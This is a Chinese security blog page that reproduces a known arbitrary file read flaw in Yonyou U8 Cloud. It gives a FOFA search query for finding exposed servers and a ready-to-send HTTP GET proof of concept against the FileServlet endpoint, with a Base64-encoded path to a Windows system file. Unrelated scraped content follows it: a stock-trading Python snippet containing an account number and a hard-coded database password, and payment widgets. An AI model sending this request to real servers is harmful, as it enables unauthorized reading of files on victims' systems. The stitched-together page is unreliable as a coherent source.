【漏洞复现】(Nday)用友U8 Cloud 任意文件读取漏洞复现

声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!

0x01:FOFA语句

app="用友-U8-Cloud"

0x02:漏洞POC

对路径进行Base64编码

GET /service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ== HTTP/1.1
Host: IP/HOSt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

直接发包测试

  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
#encoding:gbk import pandas as pd import numpy as np import talib import datetime import time import sys sys.path.append(r'D:\国信\国信iQuant策略交易平台\bin.x64\Lib\site-packages') import pymysql stocklist = ['002587.SZ', '300548.SZ', '301046.SZ', '001287.SZ', '300052.SZ', '300603.SZ', '300926.SZ', '300605.SZ', '300826.SZ', '301049.SZ'] def init(ContextInfo): ContextInfo.accID = "410001212417" #str(account) 交易帐号 ContextInfo.buy = True ContextInfo.sell = False today = datetime.datetime.now().strftime('%Y-%m-%d') #定义时间 order_time = today + ' 19:06:30' #定义时间 买股票 ContextInfo.run_time("myHandlebar", '1nDay', order_time, "SZ") #一天执行一次定义的myHandlebar def myHandlebar(ContextInfo): try: db = pymysql.connect(host='127.0.0.1', user='user', password='123456', db='python') print('数据库连接成功') except pymysql.Error as e: print('数据库连接失败') def get_stock_data(stock): G1 = ContextInfo.get_full_tick([stock]) # 获取分笔数据 G2 = [stock, G1[stock]['lastPrice'], G1[stock]['lastClose'], G1[stock]['pvolume']] # 最新 收盘 成交量 G3 = ContextInfo.get_last_volume(stock) # 总流通股 G4 = ContextInfo.get_instrumentdetail(stock) # 财表 G5 = [G4['TotalVolumn']] # 总股本 S1 = [G2[1] / G2[2] * 100 - 100] #涨幅 S2 = [G2[3] / G3 * 100] #换手率 S3 = [G2[1] * item for item in G5] #总市值 return [S1, S2, S3] stock_data = {} for stock in stocklist: stock_data[stock] = get_stock_data(stock) print(stock_data) 我打代码是这样,打印出来的结果是:{'002587.SZ': [[1.0479041916167802], [1.9914331748339686], [4397895000.0]], '300548.SZ': [[-3.7646314457450103], [9.90358201249419], [8700728400.0]], '301046.SZ': [[1.8993668777074362], [2.722894468951476], [4577520200.0]], '001287.SZ': [[0.9848484848484986], [4.357778802843653], [20258934000.0]], '300052.SZ': [[0.16330974414806576], [1.3332567665862716], [4818040000.000001]], '300603.SZ': [[0.3496503496503607], [1.4677953941892266], [5335789200.0]], '300926.SZ': [[-0.25839793281653556], [6.75514802163393], [6457471200.0]], '300605.SZ': [[-0.13888888888888573], [1.495405645304456], [2364934800.0]], '300826.SZ': [[8.338480543545373], [15.573514174701398], [2553824000.0]], '301049.SZ': [[-8.936698386429455], [19.581253894080998], [2074442500.0000002]]},在这代码的基础上,帮我把其中的'002587.SZ'对应的数值打印出来
07-25

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值